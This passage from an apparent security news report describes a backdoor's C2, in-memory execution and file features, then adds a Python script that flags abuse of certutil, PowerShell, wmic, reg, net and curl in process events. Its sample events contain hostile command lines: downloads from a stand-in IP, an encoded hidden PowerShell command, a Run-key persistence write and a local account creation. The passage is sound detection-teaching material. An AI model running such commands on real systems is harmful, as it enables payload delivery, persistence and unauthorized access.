The backdoor itself reaches out to a command-and-control (C2) server and can execute code delivered from it directly in memory, without writing it to disk. Other features include the ability to write, delete, and move files on the victim machine and to download files from and upload files to the C2 server.
The researchers have also observed a credential-stealing .NET DLL being downloaded and executed on victims' networks, in addition to ModeloRAT. The attackers also lean on built-in system tools rather than custom utilities: curl, reg.exe, net.exe, PowerShell, certutil.exe, and the Windows Management Instrumentation command-line tool (wmic.exe).
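Because the tools listed above are legitimate system binaries, blocking them outright is rarely an option; what distinguishes abuse is the argument shape (a download switch, an encoded command, a Run-key write, an account creation) and several such uses landing on the same host. The following script is an added example, not code from the researchers or from the report, showing how that logic can be run over process-creation events. The event records, hostnames, paths and IP address are constructed sample data, and the rule set is an illustrative starting point rather than a complete detection for this campaign.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample process-creation events in a Sysmon Event ID 1 shape.
# They are illustrative and are not events from the researchers' report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/upd.bin C:\Users\Public\upd.bin"},
    {"host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="},
    {"host": "ws02", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic process call create "rundll32.exe C:\ProgramData\cred.dll,Start"'},
    {"host": "ws02", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /t REG_SZ /d C:\Users\Public\upd.bin"},
    {"host": "ws03", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net.exe user svc_backup Passw0rd! /add"},
    {"host": "ws03", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -s -o C:\Users\Public\stage2.dll http://198.51.100.7/s2"},
    # Benign uses of the same binaries: the rules key on arguments, not on
    # the tool name alone, so these must not fire.
    {"host": "ws04", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\installer.msi SHA256"},
    {"host": "ws04", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net.exe use"},
]

# (rule name, image basename, regex over the command line). Each pattern
# targets an argument shape abused for download, execution, persistence or
# account creation; ordinary use of the binary does not match.
RULES: List[Tuple[str, str, "re.Pattern[str]"]] = [
    ("certutil_urlcache_download", "certutil.exe",
     re.compile(r"-urlcache\b.*\s-f\s+\S*://", re.I)),
    ("powershell_encoded_command", "powershell.exe",
     re.compile(r"\s-(?:ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("wmic_process_call_create", "wmic.exe",
     re.compile(r"\bprocess\s+call\s+create\b", re.I)),
    ("reg_run_key_persistence", "reg.exe",
     re.compile(r"\badd\b.*\\CurrentVersion\\Run(?:Once)?\b", re.I)),
    ("net_user_add", "net.exe",
     re.compile(r"\buser\b.*\s/add\b", re.I)),
    ("curl_download_to_disk", "curl.exe",
     re.compile(r"^(?=.*\s(?:-o|--output)\s)(?=.*\S+://)", re.I)),
]


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per (event, rule) pair whose image and arguments match."""
    findings = []
    for ev in events:
        exe = ev["image"].rsplit("\\", 1)[-1].lower()
        for name, image, pattern in RULES:
            if exe == image and pattern.search(ev["cmdline"]):
                findings.append({"host": ev["host"], "rule": name, "cmdline": ev["cmdline"]})
    return findings


def escalate(findings: List[Dict[str, str]], threshold: int = 2) -> List[str]:
    """Hosts on which at least `threshold` distinct rules fired.

    A single certutil download is noisy on its own; the same host also
    writing a Run key or adding a local account is a much stronger signal.
    """
    per_host: Dict[str, set] = defaultdict(set)
    for f in findings:
        per_host[f["host"]].add(f["rule"])
    return sorted(h for h, rules in per_host.items() if len(rules) >= threshold)


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h['host']:<6} {h['rule']:<28} {h['cmdline']}")
    print("escalate:", escalate(hits))
```

On the constructed sample the script flags six events and escalates ws01, ws02 and ws03, while ws04's hash check and `net use` pass untouched. In a real deployment the rules would be fed from the SIEM's process-creation source and tuned against the environment's own baseline of administrative activity, since every one of these tools has legitimate uses that look superficially similar.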
“The fact that Mistic executes in memory and also has a kill switch built in means that it is very stealthy, potentially allowing for long-term, stealthy access for attackers,” the researchers said.
